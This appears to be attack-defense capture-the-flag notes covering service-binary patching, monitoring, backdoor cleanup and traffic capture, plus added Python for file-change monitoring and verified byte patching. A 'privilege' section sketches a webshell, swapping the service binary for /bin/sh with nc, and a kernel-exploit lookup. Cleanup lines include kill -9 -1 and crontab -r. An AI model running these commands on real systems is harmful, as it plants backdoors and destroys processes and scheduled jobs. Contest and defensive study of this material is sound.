File sharing
- Samba / Windows file sharing / FTP
- IP Messenger (飞鸽传书)
- HackMD
Passwordless login
vim ~/.ssh/config
ssh-keygen -t rsa
Get comfortable with byobu/tmux/screen
patch
cp pwn_patched /path/to/version/pwn_0911_what_are_changes   # keep every patched build under version control
scp pwn_0911_what_are_changes ctf-pwn:/tmp/pwn_patch_newest
Then on the target box (ctf@ctf-pwn$):
- rm /home/pwn/pwn; cp /tmp/pwn_patch_newest /home/pwn/pwn
- chmod +x /home/pwn/pwn
Web: edit the files in place
restore
- tar zxvf
privilege
- webshell
- cp pwn pwn.bak;cp /bin/sh pwn;(echo yyy|nc )
- uname -a ->4.4.0-ubuntu-136 ->db-exploit.org ->...
- mysql with root>grant select,update,delete on da....
monitor
ps -ef | grep apache2 | wc -l
while true; do ps -u pwn; sleep 1; done   (sleep takes a plain number, not sleep(1))
ps -o pid (run it several times and compare how fast the PIDs grow; catches backdoors that keep re-spawning)
inotifywait -m -r /var/www/html /tmp   (inotify-tools; watch the web root and /tmp for new or changed files)
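When inotify-tools is not installed on the box, the same "what just appeared under the web root or /tmp" question can be answered by polling. The following is an added example, not part of the original notes: it takes a hashed snapshot of the watched directories and reports files that were added, modified or removed between two snapshots. It is stdlib only; the directory and file names in the demo are constructed in a temporary directory.

```python
"""Polling file-change monitor (added example; stdlib only).

snapshot()       -> {path: (mode, size, sha256)} for every file under the roots
diff_snapshots() -> which paths were added / removed / modified
watch()          -> generator that polls and yields each non-empty diff
"""
import hashlib
import os
import tempfile
import time


def _digest(path, chunk=65536):
    """SHA-256 of a file's contents, read in chunks so large uploads are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(roots):
    """Record mode, size and content hash of every file below the given roots."""
    state = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                    if os.path.islink(path):
                        # a dropped symlink is itself suspicious; record its target
                        state[path] = ("link", os.readlink(path))
                    else:
                        state[path] = (oct(st.st_mode & 0o7777), st.st_size, _digest(path))
                except OSError:
                    continue  # vanished mid-scan or unreadable; next poll will catch it
    return state


def diff_snapshots(old, new):
    """Compare two snapshots; a changed mode, size or hash counts as modified."""
    return {
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
        "modified": sorted(p for p in new if p in old and new[p] != old[p]),
    }


def watch(roots, interval=1.0, rounds=None):
    """Poll every `interval` seconds (forever, or `rounds` times) and yield diffs."""
    prev = snapshot(roots)
    done = 0
    while rounds is None or done < rounds:
        time.sleep(interval)
        cur = snapshot(roots)
        changes = diff_snapshots(prev, cur)
        if any(changes.values()):
            yield changes
        prev = cur
        done += 1


def demo():
    """Constructed scenario in a temp dir: one file added, one changed, one removed."""
    with tempfile.TemporaryDirectory() as www:
        paths = {n: os.path.join(www, n) for n in ("index.php", "old.txt")}
        for p in paths.values():
            with open(p, "w") as f:
                f.write("original\n")
        before = snapshot([www])
        with open(os.path.join(www, "upload.php"), "w") as f:  # constructed new file
            f.write("<?php echo 'new file'; ?>\n")
        with open(paths["index.php"], "a") as f:                 # constructed modification
            f.write("appended\n")
        os.remove(paths["old.txt"])                              # constructed deletion
        changes = diff_snapshots(before, snapshot([www]))
        return {k: [os.path.basename(p) for p in v] for k, v in changes.items()}


if __name__ == "__main__":
    print(demo())
    # real use: for changes in watch(["/var/www/html", "/tmp"]): print(changes)
```

Hashing content rather than trusting mtime matters here: a dropped file can have its timestamp set to match its neighbours, but the hash of the web root still changes.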
clean backdoor
killall -u pwn / killall -u www-data
kill -9 -1   (kills every process the current user is allowed to signal)
crontab -r
chmod 777 /path/to/backdoor.php; rm /path/to/backdoor.php   (when you cannot delete it directly, change its permissions first)
Once you confirm the box has been rooted, ask for a reset
automation
- multiprocessing
- paramiko / from pwn import ssh
- flask (flag submission API)
easy patch
Idea: make a small change to the program's logic or a constant so the exploit stops working.
plt.free -> ret
    sub esp, 20h
    mov ecx, [esp+10]
change to
    sub esp, 30h
    mov ecx, [esp+10]
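The two patches above (turning a PLT stub into `ret`, growing the stack frame from 20h to 30h) are both same-length byte replacements, and the way they go wrong is patching the wrong offset or a different build. The following is an added example, not code from the original notes: a patcher that only writes when the bytes at the offset are exactly the expected original, pads shorter replacements with NOPs so later instructions keep their addresses, and records a hash of each version for the version-management step. The 32-bit x86 encodings (`83 EC 20` = sub esp,20h; `83 EC 30` = sub esp,30h; `8B 4C 24 10` = mov ecx,[esp+10h]; `C3` = ret; `FF 25` = jmp [addr]) are assumptions stated in the code, and the "binary" is a constructed byte string, not a real ELF.

```python
"""Verified same-length byte patching (added example; stdlib only)."""
import hashlib

# Assumed 32-bit x86 encodings for the instructions in the notes above.
SUB_ESP_20 = bytes.fromhex("83ec20")      # sub esp, 20h
SUB_ESP_30 = bytes.fromhex("83ec30")      # sub esp, 30h
MOV_ECX_ESP10 = bytes.fromhex("8b4c2410")  # mov ecx, [esp+10h]
JMP_IND = bytes.fromhex("ff25")           # jmp dword ptr [addr], start of a PLT stub
RET = b"\xc3"
NOP = b"\x90"


def fingerprint(data):
    """SHA-256 hex of a build, handy as part of the versioned file name."""
    return hashlib.sha256(data).hexdigest()


def patch_bytes(data, offset, expected, replacement):
    """Return a patched copy; refuse unless the original bytes match exactly."""
    if len(replacement) > len(expected):
        raise ValueError("replacement longer than original: would shift following code")
    found = data[offset:offset + len(expected)]
    if found != expected:
        raise ValueError(f"expected {expected.hex()} at {offset:#x}, found {found.hex()}")
    # pad with NOPs so every instruction after the patch keeps its address
    replacement = replacement + NOP * (len(expected) - len(replacement))
    return data[:offset] + replacement + data[offset + len(expected):]


def stub_to_ret(data, offset):
    """plt.free -> ret: the stub's 'jmp [addr]' opcode becomes 'ret; nop'."""
    return patch_bytes(data, offset, JMP_IND, RET)


def enlarge_frame(data):
    """sub esp,20h -> sub esp,30h, located by the prologue pattern from the notes."""
    pattern = SUB_ESP_20 + MOV_ECX_ESP10
    offset = data.find(pattern)
    if offset < 0:
        raise ValueError("prologue 'sub esp,20h; mov ecx,[esp+10h]' not found")
    return patch_bytes(data, offset, SUB_ESP_20, SUB_ESP_30)


def demo():
    """Constructed sample: a 6-byte PLT stub followed by the prologue, then ret."""
    plt_stub = JMP_IND + (0x0804A010).to_bytes(4, "little")  # constructed GOT address
    binary = plt_stub + SUB_ESP_20 + MOV_ECX_ESP10 + RET
    patched = enlarge_frame(stub_to_ret(binary, 0))
    assert len(patched) == len(binary)  # same-length invariant
    return patched.hex()


if __name__ == "__main__":
    print(demo())  # c39010a0040883ec308b4c2410c3
```

The length check is the important part: a replacement that is even one byte longer would shift every following instruction, and a patch applied to an unverified offset can break the service you are trying to protect. Run the patched binary through your own test case before deploying it with the `scp` step above.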
capture traffic
- tcpdump -i <interface> -s 0 -w 1.pcap
- traffic forwarding
- ptrace